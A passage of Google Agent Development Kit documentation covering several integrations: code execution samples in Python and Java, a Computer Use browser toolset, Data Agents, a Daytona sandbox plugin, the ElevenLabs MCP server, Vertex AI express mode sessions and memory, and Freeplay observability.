This allows the model to perform tasks like calculations, data manipulation, or running small scripts.

**Warning: Single tool per agent limitation.** This tool can only be used ***by itself*** within an agent instance. For more information about this limitation and workarounds, see [Limitations for ADK tools](/adk-docs/tools/limitations/#one-tool-one-agent).

````py
# Copyright 2025 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import asyncio
from google.adk.agents import LlmAgent
from google.adk.runners import Runner
from google.adk.sessions import InMemorySessionService
from google.adk.code_executors import BuiltInCodeExecutor
from google.genai import types

AGENT_NAME = "calculator_agent"
APP_NAME = "calculator"
USER_ID = "user1234"
SESSION_ID = "session_code_exec_async"
GEMINI_MODEL = "gemini-2.0-flash"

# Agent Definition
code_agent = LlmAgent(
    name=AGENT_NAME,
    model=GEMINI_MODEL,
    code_executor=BuiltInCodeExecutor(),
    instruction="""You are a calculator agent.
    When given a mathematical expression, write and execute Python code to calculate the result.
    Return only the final numerical result as plain text, without markdown or code blocks.
    """,
    description="Executes Python code to perform calculations.",
)

# Session and Runner
session_service = InMemorySessionService()
session = asyncio.run(session_service.create_session(
    app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID
))
runner = Runner(agent=code_agent, app_name=APP_NAME, session_service=session_service)


# Agent Interaction (Async)
async def call_agent_async(query):
    content = types.Content(role="user", parts=[types.Part(text=query)])
    print(f"\n--- Running Query: {query} ---")
    final_response_text = "No final text response captured."
    try:
        # Use run_async
        async for event in runner.run_async(
            user_id=USER_ID, session_id=SESSION_ID, new_message=content
        ):
            print(f"Event ID: {event.id}, Author: {event.author}")

            # --- Check for specific parts FIRST ---
            has_specific_part = False
            if event.content and event.content.parts:
                for part in event.content.parts:  # Iterate through all parts
                    if part.executable_code:
                        # Access the actual code string via .code
                        print(
                            f" Debug: Agent generated code:\n```python\n{part.executable_code.code}\n```"
                        )
                        has_specific_part = True
                    elif part.code_execution_result:
                        # Access outcome and output correctly
                        print(
                            f" Debug: Code Execution Result: {part.code_execution_result.outcome} - Output:\n{part.code_execution_result.output}"
                        )
                        has_specific_part = True
                    # Also print any text parts found in any event for debugging
                    elif part.text and not part.text.isspace():
                        print(f" Text: '{part.text.strip()}'")
                        # Do not set has_specific_part=True here, as we want the final response logic below

            # --- Check for final response AFTER specific parts ---
            # Only consider it final if it doesn't have the specific code parts we just handled
            if not has_specific_part and event.is_final_response():
                if (
                    event.content
                    and event.content.parts
                    and event.content.parts[0].text
                ):
                    final_response_text = event.content.parts[0].text.strip()
                    print(f"==> Final Agent Response: {final_response_text}")
                else:
                    print("==> Final Agent Response: [No text content in final event]")

    except Exception as e:
        print(f"ERROR during agent run: {e}")
    print("-" * 30)


# Main async function to run the examples
async def main():
    await call_agent_async("Calculate the value of (5 + 7) * 3")
    await call_agent_async("What is 10 factorial?")


# Execute the main async function
try:
    asyncio.run(main())
except RuntimeError as e:
    # Handle specific error when running asyncio.run in an already running loop (like Jupyter/Colab)
    if "cannot be called from a running event loop" in str(e):
        print("\nRunning in an existing event loop (like Colab/Jupyter).")
        print("Please run `await main()` in a notebook cell instead.")
        # If in an interactive environment like a notebook, you might need to run:
        # await main()
    else:
        raise e  # Re-raise other runtime errors
````

````java
import com.google.adk.agents.BaseAgent;
import com.google.adk.agents.LlmAgent;
import com.google.adk.runner.Runner;
import com.google.adk.sessions.InMemorySessionService;
import com.google.adk.sessions.Session;
import com.google.adk.tools.BuiltInCodeExecutionTool;
import com.google.common.collect.ImmutableList;
import com.google.genai.types.Content;
import com.google.genai.types.Part;

public class CodeExecutionAgentApp {

  private static final String AGENT_NAME = "calculator_agent";
  private static final String APP_NAME = "calculator";
  private static final String USER_ID = "user1234";
  private static final String SESSION_ID = "session_code_exec_sync";
  private static final String GEMINI_MODEL = "gemini-2.0-flash";

  /**
   * Calls the agent with a query and prints the interaction events and final response.
   *
   * @param runner The runner instance for the agent.
   * @param query The query to send to the agent.
   */
  public static void callAgent(Runner runner, String query) {
    Content content =
        Content.builder().role("user").parts(ImmutableList.of(Part.fromText(query))).build();

    InMemorySessionService sessionService = (InMemorySessionService) runner.sessionService();
    Session session =
        sessionService
            .createSession(APP_NAME, USER_ID, /* state= */ null, SESSION_ID)
            .blockingGet();

    System.out.println("\n--- Running Query: " + query + " ---");
    final String[] finalResponseText = {"No final text response captured."};

    try {
      runner
          .runAsync(session.userId(), session.id(), content)
          .forEach(
              event -> {
                System.out.println("Event ID: " + event.id() + ", Author: " + event.author());

                boolean hasSpecificPart = false;
                if (event.content().isPresent() && event.content().get().parts().isPresent()) {
                  for (Part part : event.content().get().parts().get()) {
                    if (part.executableCode().isPresent()) {
                      System.out.println(
                          " Debug: Agent generated code:\n```python\n"
                              + part.executableCode().get().code()
                              + "\n```");
                      hasSpecificPart = true;
                    } else if (part.codeExecutionResult().isPresent()) {
                      System.out.println(
                          " Debug: Code Execution Result: "
                              + part.codeExecutionResult().get().outcome()
                              + " - Output:\n"
                              + part.codeExecutionResult().get().output());
                      hasSpecificPart = true;
                    } else if (part.text().isPresent() && !part.text().get().trim().isEmpty()) {
                      System.out.println(" Text: '" + part.text().get().trim() + "'");
                    }
                  }
                }

                if (!hasSpecificPart && event.finalResponse()) {
                  if (event.content().isPresent()
                      && event.content().get().parts().isPresent()
                      && !event.content().get().parts().get().isEmpty()
                      && event.content().get().parts().get().get(0).text().isPresent()) {
                    finalResponseText[0] =
                        event.content().get().parts().get().get(0).text().get().trim();
                    System.out.println("==> Final Agent Response: " + finalResponseText[0]);
                  } else {
                    System.out.println(
                        "==> Final Agent Response: [No text content in final event]");
                  }
                }
              });
    } catch (Exception e) {
      System.err.println("ERROR during agent run: " + e.getMessage());
      e.printStackTrace();
    }
    System.out.println("------------------------------");
  }

  public static void main(String[] args) {
    BuiltInCodeExecutionTool codeExecutionTool = new BuiltInCodeExecutionTool();

    BaseAgent codeAgent =
        LlmAgent.builder()
            .name(AGENT_NAME)
            .model(GEMINI_MODEL)
            .tools(ImmutableList.of(codeExecutionTool))
            .instruction(
                """
                You are a calculator agent.
                When given a mathematical expression, write and execute Python code to calculate the result.
                Return only the final numerical result as plain text, without markdown or code blocks.
                """)
            .description("Executes Python code to perform calculations.")
            .build();

    InMemorySessionService sessionService = new InMemorySessionService();
    Runner runner = new Runner(codeAgent, APP_NAME, null, sessionService);

    callAgent(runner, "Calculate the value of (5 + 7) * 3");
    callAgent(runner, "What is 10 factorial?");
  }
}
````

# Gemini API Computer Use tool for ADK

Supported in ADK: Python v1.17.0 (Preview)

The Computer Use Toolset allows an agent to operate a computer's user interface, such as a browser, to complete tasks. This tool uses a specific Gemini model and the [Playwright](https://playwright.dev/) testing tool to control a Chromium browser, and it can interact with web pages by taking screenshots, clicking, typing, and navigating.

For more information about the computer use model, see Gemini API [Computer use](https://ai.google.dev/gemini-api/docs/computer-use) or the Google Cloud Vertex AI API [Computer use](https://cloud.google.com/vertex-ai/generative-ai/docs/computer-use).

**Preview release:** The Computer Use model and tool are a Preview release. For more information, see the [launch stage descriptions](https://cloud.google.com/products#product-launch-stages).

## Setup

You must install Playwright and its dependencies, including Chromium, to be able to use the Computer Use Toolset.
**Recommended: create and activate a Python virtual environment**

Create a Python virtual environment:

```shell
python -m venv .venv
```

Activate the Python virtual environment.

Windows CMD:

```console
.venv\Scripts\activate.bat
```

Windows PowerShell:

```console
.venv\Scripts\Activate.ps1
```

macOS / Linux:

```bash
source .venv/bin/activate
```

To set up the required software libraries for the Computer Use Toolset:

1. Install Python dependencies:

   ```console
   pip install termcolor==3.1.0
   pip install playwright==1.52.0
   pip install browserbase==1.3.0
   pip install rich
   ```

1. Install the Playwright dependencies, including the Chromium browser:

   ```console
   playwright install-deps chromium
   playwright install chromium
   ```

## Use the tool

Use the Computer Use Toolset by adding it as a tool to your agent. When you configure the tool, you must provide an implementation of the `BaseComputer` class, which defines an interface for an agent to use a computer. In the following example, the `PlaywrightComputer` class is defined for this purpose. You can find the code for this implementation in the `playwright.py` file of the [computer_use](https://github.com/google/adk-python/blob/main/contributing/samples/computer_use/playwright.py) agent sample project.

```python
from google.adk import Agent
from google.adk.models.google_llm import Gemini
from google.adk.tools.computer_use.computer_use_toolset import ComputerUseToolset
from typing_extensions import override

from .playwright import PlaywrightComputer

root_agent = Agent(
    model='gemini-2.5-computer-use-preview-10-2025',
    name='hello_world_agent',
    description=(
        'computer use agent that can operate a browser on a computer to finish'
        ' user tasks'
    ),
    instruction='you are a computer use agent',
    tools=[
        ComputerUseToolset(computer=PlaywrightComputer(screen_size=(1280, 936)))
    ],
)
```

For a complete code example, see the [computer_use](https://github.com/google/adk-python/tree/main/contributing/samples/computer_use) agent sample project.
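Because the toolset depends on several separately installed packages, a quick preflight check can save a failed first run. The sketch below uses only the Python standard library to report which of the packages from the Setup section cannot be imported in the active environment. The helper name `missing_modules` is hypothetical and not part of ADK, and the module names are assumed to match the pip package names listed above. It does not verify that the Chromium browser binary was downloaded.

```python
import importlib.util
import shutil

# Import names of the Python packages installed in the Setup section.
REQUIRED_MODULES = ("termcolor", "playwright", "browserbase", "rich")


def missing_modules(modules=REQUIRED_MODULES) -> list[str]:
    """Return the names in `modules` that cannot be located for import."""
    return [name for name in modules if importlib.util.find_spec(name) is None]


if __name__ == "__main__":
    missing = missing_modules()
    cli_found = shutil.which("playwright") is not None

    if missing:
        print("Missing Python packages:", ", ".join(missing))
    if not cli_found:
        print("The `playwright` command was not found on PATH.")
    if not missing and cli_found:
        print("Python-side prerequisites appear to be installed.")
```

Run the script inside the same virtual environment you use for the agent, since the check only reflects the interpreter that executes it.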
# Google Cloud Data Agents tool for ADK

Supported in ADK: Python v1.23.0

This toolset integrates ADK agents with Data Agents powered by the [Conversational Analytics API](https://docs.cloud.google.com/gemini/docs/conversational-analytics-api/overview).

Data Agents are AI-powered agents that help you analyze your data using natural language. When configuring a Data Agent, you can choose from supported data sources, including **BigQuery**, **Looker**, and **Looker Studio**.

**Prerequisites**

Before using these tools, you must build and configure your Data Agents in Google Cloud:

- [Build a data agent using HTTP and Python](https://docs.cloud.google.com/gemini/docs/conversational-analytics-api/build-agent-http)
- [Build a data agent using the Python SDK](https://docs.cloud.google.com/gemini/docs/conversational-analytics-api/build-agent-sdk)
- [Create a data agent in BigQuery Studio](https://docs.cloud.google.com/bigquery/docs/create-data-agents#create_a_data_agent)

The `DataAgentToolset` packages the following tools:

- **`list_accessible_data_agents`**: Lists Data Agents you have permission to access in the configured GCP project.
- **`get_data_agent_info`**: Retrieves details about a specific Data Agent given its full resource name.
- **`ask_data_agent`**: Chats with a specific Data Agent using natural language.

```py
# Copyright 2026 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import asyncio

from google.adk.agents import Agent
from google.adk.runners import Runner
from google.adk.sessions import InMemorySessionService
from google.adk.tools.data_agent.config import DataAgentToolConfig
from google.adk.tools.data_agent.credentials import DataAgentCredentialsConfig
from google.adk.tools.data_agent.data_agent_toolset import DataAgentToolset
from google.genai import types
import google.auth

# Define constants for this example agent
AGENT_NAME = "data_agent_example"
APP_NAME = "data_agent_app"
USER_ID = "user1234"
SESSION_ID = "1234"
GEMINI_MODEL = "gemini-2.5-flash"

# Define tool configuration
tool_config = DataAgentToolConfig(
    max_query_result_rows=100,
)

# Use Application Default Credentials (ADC)
# https://cloud.google.com/docs/authentication/provide-credentials-adc
application_default_credentials, _ = google.auth.default()
credentials_config = DataAgentCredentialsConfig(
    credentials=application_default_credentials
)

# Instantiate a Data Agent toolset
da_toolset = DataAgentToolset(
    credentials_config=credentials_config,
    data_agent_tool_config=tool_config,
    tool_filter=[
        "list_accessible_data_agents",
        "get_data_agent_info",
        "ask_data_agent",
    ],
)

# Agent Definition
data_agent = Agent(
    name=AGENT_NAME,
    model=GEMINI_MODEL,
    description="Agent to answer user questions using Data Agents.",
    instruction=(
        "## Persona\nYou are a helpful assistant that uses Data Agents"
        " to answer user questions about their data.\n\n"
    ),
    tools=[da_toolset],
)

# Session and Runner
session_service = InMemorySessionService()
session = asyncio.run(
    session_service.create_session(
        app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID
    )
)
runner = Runner(
    agent=data_agent, app_name=APP_NAME, session_service=session_service
)


# Agent Interaction
def call_agent(query):
    """
    Helper function to call the agent with a query.
    """
    content = types.Content(role="user", parts=[types.Part(text=query)])
    events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content)

    print("USER:", query)
    for event in events:
        if event.is_final_response():
            final_response = event.content.parts[0].text
            print("AGENT:", final_response)


call_agent("List accessible data agents in project .")
call_agent("Get information about .")
# The data agent in this example is configured with the BigQuery table:
# `bigquery-public-data.san_francisco.street_trees`
call_agent("Ask to count the rows in the table.")
call_agent("What are the columns in the table?")
call_agent("What are the top 5 tree species?")
call_agent("For those species, what is the distribution of legal status?")
```

# Daytona plugin for ADK

Supported in ADK: Python

The [Daytona ADK plugin](https://github.com/daytonaio/daytona-adk-plugin) connects your ADK agent to [Daytona](https://www.daytona.io/) sandboxes. This integration gives your agent the ability to execute code, run shell commands, and manage files in isolated environments, enabling secure execution of AI-generated code.

## Use cases

- **Secure Code Execution**: Run Python, JavaScript, and TypeScript code in isolated sandboxes without risking your local environment.
- **Shell Command Automation**: Execute shell commands with configurable timeouts and working directories for build tasks, installations, or system operations.
- **File Management**: Upload scripts and datasets to sandboxes, then retrieve generated outputs and results.
## Prerequisites

- A [Daytona](https://www.daytona.io/) account
- Daytona API key

## Installation

```bash
pip install daytona-adk
```

## Use with agent

```python
from daytona_adk import DaytonaPlugin
from google.adk.agents import Agent

plugin = DaytonaPlugin(
    api_key="your-daytona-api-key"  # Or set DAYTONA_API_KEY environment variable
)

root_agent = Agent(
    model="gemini-2.5-pro",
    name="sandbox_agent",
    instruction="Help users execute code and commands in a secure sandbox",
    tools=plugin.get_tools(),
)
```

## Available tools

| Tool | Description |
| ------------------------------------ | ---------------------------------------------- |
| `execute_code_in_daytona` | Execute Python, JavaScript, or TypeScript code |
| `execute_command_in_daytona` | Run shell commands |
| `upload_file_to_daytona` | Upload scripts or data files to the sandbox |
| `read_file_from_daytona` | Read script outputs or generated files |
| `start_long_running_command_daytona` | Start background processes (servers, watchers) |

## Learn more

For a detailed guide on building a code generator agent that writes, tests, and verifies code in secure sandboxes, check out [this guide](https://www.daytona.io/docs/en/google-adk-code-generator).

## Additional resources

- [Code Generator Agent Guide](https://www.daytona.io/docs/en/google-adk-code-generator)
- [Daytona ADK on PyPI](https://pypi.org/project/daytona-adk/)
- [Daytona ADK on GitHub](https://github.com/daytonaio/daytona-adk-plugin)
- [Daytona Documentation](https://www.daytona.io/docs)

# ElevenLabs MCP tool for ADK

Supported in ADK: Python, TypeScript

The [ElevenLabs MCP Server](https://github.com/elevenlabs/elevenlabs-mcp) connects your ADK agent to the [ElevenLabs](https://elevenlabs.io/) AI audio platform. This integration gives your agent the ability to generate speech, clone voices, transcribe audio, create sound effects, and build conversational AI experiences using natural language.
## Use cases - **Text-to-Speech Generation**: Convert text into natural-sounding speech using a variety of voices, with fine-grained control over stability, style, and similarity settings. - **Voice Cloning & Design**: Clone voices from audio samples or generate new voices from text descriptions of desired characteristics like age, gender, accent, and tone. - **Audio Processing**: Isolate speech from background noise, convert audio to sound like different voices, or transcribe speech to text with speaker identification. - **Sound Effects & Soundscapes**: Generate sound effects and ambient soundscapes from text descriptions, such as "a thunderstorm in a dense jungle with animals reacting to the weather." ## Prerequisites - Sign up for an [ElevenLabs account](https://elevenlabs.io/app/sign-up) - Generate an [API key](https://elevenlabs.io/app/settings/api-keys) from your account settings ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters ELEVENLABS_API_KEY = "YOUR_ELEVENLABS_API_KEY" root_agent = Agent( model="gemini-2.5-pro", name="elevenlabs_agent", instruction="Help users generate speech, clone voices, and process audio", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="uvx", args=["elevenlabs-mcp"], env={ "ELEVENLABS_API_KEY": ELEVENLABS_API_KEY, } ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const ELEVENLABS_API_KEY = "YOUR_ELEVENLABS_API_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "elevenlabs_agent", instruction: "Help users generate speech, clone voices, and process audio", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "uvx", args: ["elevenlabs-mcp"], env: { ELEVENLABS_API_KEY: ELEVENLABS_API_KEY, }, }, }), ], }); 
export { rootAgent }; ``` ## Available tools ### Text-to-speech and voice | Tool | Description | | --------------------------- | ------------------------------------------------- | | `text_to_speech` | Generate speech from text using a specified voice | | `speech_to_speech` | Transform audio to sound like a different voice | | `text_to_voice` | Generate a voice preview from text description | | `create_voice_from_preview` | Save a generated voice preview to your library | | `voice_clone` | Clone a voice from audio samples | | `get_voice` | Get details about a specific voice | | `search_voices` | Search for voices in your library | | `search_voice_library` | Search the public voice library | | `list_models` | List available text-to-speech models | ### Audio processing | Tool | Description | | ------------------------- | ---------------------------------------------------- | | `speech_to_text` | Transcribe audio to text with speaker identification | | `text_to_sound_effects` | Generate sound effects from text descriptions | | `isolate_audio` | Separate speech from background noise and music | | `play_audio` | Play an audio file locally | | `compose_music` | Generate music from a description | | `create_composition_plan` | Create a plan for music composition | ### Conversational AI | Tool | Description | | ----------------------------- | ---------------------------------------------- | | `create_agent` | Create a conversational AI agent | | `get_agent` | Get details about a specific agent | | `list_agents` | List all your conversational AI agents | | `add_knowledge_base_to_agent` | Add a knowledge base to an agent | | `make_outbound_call` | Initiate an outbound phone call using an agent | | `list_phone_numbers` | List available phone numbers | | `get_conversation` | Get details about a specific conversation | | `list_conversations` | List all conversations | ### Account | Tool | Description | | -------------------- | ---------------------------------------- | | 
`check_subscription` | Check your subscription and credit usage | ## Configuration The ElevenLabs MCP server can be configured using environment variables: | Variable | Description | Default | | ---------------------------- | --------------------------------------- | ----------- | | `ELEVENLABS_API_KEY` | Your ElevenLabs API key | Required | | `ELEVENLABS_MCP_BASE_PATH` | Base path for file operations | `~/Desktop` | | `ELEVENLABS_MCP_OUTPUT_MODE` | How generated files are returned | `files` | | `ELEVENLABS_API_RESIDENCY` | Data residency region (enterprise only) | `us` | ### Output modes The `ELEVENLABS_MCP_OUTPUT_MODE` environment variable supports three modes: - **`files`** (default): Save files to disk and return file paths - **`resources`**: Return files as MCP resources (base64-encoded binary data) - **`both`**: Save files to disk AND return as MCP resources ## Additional resources - [ElevenLabs MCP Server Repository](https://github.com/elevenlabs/elevenlabs-mcp) - [Introducing ElevenLabs MCP](https://elevenlabs.io/blog/introducing-elevenlabs-mcp) - [ElevenLabs Documentation](https://elevenlabs.io/docs) # Google Cloud Vertex AI express mode for ADK Supported in ADKPython v0.1.0Java v0.1.0Preview Google Cloud Vertex AI express mode provides a no-cost access tier for prototyping and development, allowing you to use Vertex AI services without creating a full Google Cloud Project. This service includes access to many powerful Vertex AI services, including: - [Vertex AI SessionService](#vertex-ai-session-service) - [Vertex AI MemoryBankService](#vertex-ai-memory-bank) You can sign up for an express mode account using a Gmail account and receive an API key to use with the ADK. Obtain an API key through the [Google Cloud Console](https://console.cloud.google.com/expressmode). For more information, see [Vertex AI express mode](https://cloud.google.com/vertex-ai/generative-ai/docs/start/express-mode/overview). 
**Preview release:** The Vertex AI express mode feature is a Preview release. For more information, see the [launch stage descriptions](https://cloud.google.com/products#product-launch-stages).

**Vertex AI express mode limitations:** Vertex AI express mode projects are valid for only 90 days, and only select services are available, each with limited quota. For example, the number of Agent Engines is restricted to 10, and deployment to Agent Engine requires paid access. To remove the quota restrictions and use all of Vertex AI's services, add a billing account to your express mode project.

## Configure Agent Engine container

When using Vertex AI express mode, create an `AgentEngine` object to enable Vertex AI management of agent components such as `Session` and `Memory` objects. With this approach, `Session` objects are handled as children of the `AgentEngine` object. Before running your agent, make sure your environment variables are set correctly, as shown below:

agent/.env

```text
GOOGLE_GENAI_USE_VERTEXAI=TRUE
GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE
```

Next, create your Agent Engine instance using the Vertex AI SDK.

1. Import the Vertex AI SDK.

   ```py
   import vertexai
   from vertexai import agent_engines
   ```

1. Initialize the Vertex AI client with your API key and create an Agent Engine instance.

   ```py
   # Create Agent Engine with Gen AI SDK
   client = vertexai.Client(
       api_key="YOUR_API_KEY",
   )

   agent_engine = client.agent_engines.create(
       config={
           "display_name": "Demo Agent Engine",
           "description": "Agent Engine for Session and Memory",
       })
   ```

1. Get the Agent Engine ID from the response to use with Memories and Sessions.

   ```py
   APP_ID = agent_engine.api_resource.name.split('/')[-1]
   ```

## Manage Sessions with `VertexAiSessionService`

[`VertexAiSessionService`](/adk-docs/sessions/session.md#sessionservice-implementations) is compatible with Vertex AI express mode API keys. With an express mode API key, you can initialize the session service without specifying a project or location.
```py
# Requires: pip install google-adk[vertexai]
# Plus environment variable setup:
# GOOGLE_GENAI_USE_VERTEXAI=TRUE
# GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE
from google.adk.sessions import VertexAiSessionService

# The app_name used with this service should be the Reasoning Engine ID or name
APP_ID = "your-reasoning-engine-id"

# Project and location are not required when initializing with Vertex express mode
session_service = VertexAiSessionService(agent_engine_id=APP_ID)

# Use APP_ID as the app_name when calling service methods, e.g.:
# session = await session_service.create_session(app_name=APP_ID, user_id= ...)
```

**Session Service Quotas:** For free express mode projects, `VertexAiSessionService` has the following quotas:

- 10 Create, delete, or update Vertex AI Agent Engine sessions per minute
- 30 Append event to Vertex AI Agent Engine sessions per minute

## Manage Memory with `VertexAiMemoryBankService`

[`VertexAiMemoryBankService`](/adk-docs/sessions/memory.md#vertex-ai-memory-bank) is compatible with Vertex AI express mode API keys. With an express mode API key, you can initialize the memory service without specifying a project or location.
```py
# Requires: pip install google-adk[vertexai]
# Plus environment variable setup:
# GOOGLE_GENAI_USE_VERTEXAI=TRUE
# GOOGLE_API_KEY=PASTE_YOUR_ACTUAL_EXPRESS_MODE_API_KEY_HERE
from google.adk.memory import VertexAiMemoryBankService

# The app_name used with this service should be the Reasoning Engine ID or name
APP_ID = "your-reasoning-engine-id"

# Project and location are not required when initializing with express mode
memory_service = VertexAiMemoryBankService(agent_engine_id=APP_ID)

# Generate a memory from that session so the Agent can remember relevant details about the user
# memory = await memory_service.add_session_to_memory(session)
```

**Memory Service Quotas:** For free express mode projects, `VertexAiMemoryBankService` has the following quotas:

- 10 Create, delete, or update Vertex AI Agent Engine memory resources per minute
- 10 Get, list, or retrieve from Vertex AI Agent Engine Memory Bank per minute

### Code Sample: Weather Agent with Session and Memory

This code sample shows a weather agent that uses both `VertexAiSessionService` and `VertexAiMemoryBankService` for context management, allowing your agent to recall user preferences and conversations.

- [Weather Agent with Session and Memory](https://github.com/google/adk-docs/blob/main/examples/python/notebooks/express-mode-weather-agent.ipynb) using Vertex AI express mode

# Freeplay observability for ADK

Supported in ADK: Python

[Freeplay](https://freeplay.ai/) provides an end-to-end workflow for building and optimizing AI agents, and it can be integrated with ADK. With Freeplay your whole team can easily collaborate to iterate on agent instructions (prompts), experiment with and compare different models and agent changes, run evals both offline and online to measure quality, monitor production, and review data by hand.
Key benefits of Freeplay:

- **Simple observability** - focused on agents, LLM calls and tool calls for easy human review
- **Online evals/automated scorers** - for error detection in production
- **Offline evals and experiment comparison** - to test changes before deploying
- **Prompt management** - supports pushing changes straight from the Freeplay playground to code
- **Human review workflow** - for collaboration on error analysis and data annotation
- **Powerful UI** - makes it possible for domain experts to collaborate closely with engineers

Freeplay and ADK complement one another. ADK gives you a powerful and expressive agent orchestration framework while Freeplay plugs in for observability, prompt management, evaluation and testing. Once you integrate with Freeplay, you can update prompts and evals from the Freeplay UI or from code, so that anyone on your team can contribute.

## Getting Started

Below is a guide for getting started with Freeplay and ADK. You can also find a full sample ADK agent repo [here](https://github.com/228Labs/freeplay-google-demo).

### Create a Freeplay Account

Sign up for a free [Freeplay account](https://freeplay.ai/signup).
After creating an account, you can define the following environment variables:

```text
FREEPLAY_PROJECT_ID=
FREEPLAY_API_KEY=
FREEPLAY_API_URL=
```

### Use Freeplay ADK Library

Install the Freeplay ADK library:

```text
pip install freeplay-python-adk
```

Freeplay will automatically capture OTel logs from your ADK application when you initialize observability:

```python
from freeplay_python_adk.client import FreeplayADK

FreeplayADK.initialize_observability()
```

You'll also want to pass the Freeplay plugin to your App:

```python
from app.agent import root_agent
from freeplay_python_adk.freeplay_observability_plugin import FreeplayObservabilityPlugin
from google.adk.runners import App

app = App(
    name="app",
    root_agent=root_agent,
    plugins=[FreeplayObservabilityPlugin()],
)

__all__ = ["app"]
```

You can now use ADK as you normally would, and you will see logs flowing to Freeplay in the Observability section.

## Observability

Freeplay's Observability feature gives you a clear view into how your agent is behaving in production. You can dig into individual agent traces to understand each step and diagnose issues. You can also use Freeplay's filtering functionality to search and filter the data across any segment of interest.

## Prompt Management (optional)

Freeplay offers [native prompt management](https://docs.freeplay.ai/docs/managing-prompts), which simplifies versioning and testing different prompts. It allows you to experiment with changes to ADK agent instructions in the Freeplay UI, test different models, and push updates straight to your code, similar to a feature flag.

To use Freeplay's prompt management capabilities alongside ADK, use the Freeplay ADK agent wrapper. `FreeplayLLMAgent` extends ADK's base `LlmAgent` class, so instead of hard-coding your prompts as agent instructions, you can version prompts in the Freeplay application.
First, define a prompt in Freeplay by going to Prompts -> Create prompt template. When creating your prompt template, you'll need to add three elements, as described in the following sections.

### System Message

This corresponds to the "instructions" section in your code.

### Agent Context Variable

Adding the following to the bottom of your system message creates a variable through which the ongoing agent context is passed:

```text
{{agent_context}}
```

### History Block

Click new message and change the role to 'history'. This ensures that past messages are passed through when present.

Now in your code you can use the `FreeplayLLMAgent`:

```python
from freeplay_python_adk.client import FreeplayADK
from freeplay_python_adk.freeplay_llm_agent import (
    FreeplayLLMAgent,
)

FreeplayADK.initialize_observability()

# Note: `tavily_search` is not defined in this snippet; it is assumed to be
# a tool defined or imported elsewhere in your project.
root_agent = FreeplayLLMAgent(
    name="social_product_researcher",
    tools=[tavily_search],
)
```

When the `social_product_researcher` is invoked, the prompt will be retrieved from Freeplay and formatted with the proper input variables.

## Evaluation

Freeplay enables you to define, version, and run [evaluations](https://docs.freeplay.ai/docs/evaluations) from the Freeplay web application. You can define evaluations for any of your prompts or agents by going to Evaluations -> "New evaluation".

These evaluations can be configured to run for both online monitoring and offline evaluation. Datasets for offline evaluation can be uploaded to Freeplay or saved from log examples.

## Dataset Management

As you get data flowing into Freeplay, you can use these logs to start building up [datasets](https://docs.freeplay.ai/docs/datasets) to test against on a repeated basis. Use production logs to create golden datasets or collections of failure cases that you can use to test against as you make changes.
## Batch Testing

As you iterate on your agent, you can run batch tests (i.e., offline experiments) at both the [prompt](https://docs.freeplay.ai/docs/component-level-test-runs) and [end-to-end](https://docs.freeplay.ai/docs/end-to-end-test-runs) agent level. This allows you to compare different models or prompt changes head to head and quantify their effect across your full agent execution.

[Here](https://github.com/freeplayai/freeplay-google-demo/blob/main/examples/example_test_run.py) is a code example for executing a batch test on Freeplay with ADK.

## Sign up now

Go to [Freeplay](https://freeplay.ai/) to sign up for an account, and check out a full Freeplay and ADK integration example [here](https://github.com/freeplayai/freeplay-google-demo/tree/main).

# GitHub MCP tool for ADK

Supported in ADK: Python, TypeScript

The [GitHub MCP Server](https://github.com/github/github-mcp-server) connects AI tools directly to GitHub's platform. This gives your ADK agent the ability to read repositories and code files, manage issues and PRs, analyze code, and automate workflows using natural language.

## Use cases

- **Repository Management**: Browse and query code, search files, analyze commits, and understand project structure across any repository you have access to.
- **Issue & PR Automation**: Create, update, and manage issues and pull requests. Let AI help triage bugs, review code changes, and maintain project boards.
- **Code Analysis**: Examine security findings, review Dependabot alerts, understand code patterns, and get comprehensive insights into your codebase.

## Prerequisites

- Create a [Personal Access Token](https://github.com/settings/personal-access-tokens/new) in GitHub. Refer to the [documentation](https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/managing-your-personal-access-tokens) for more information.
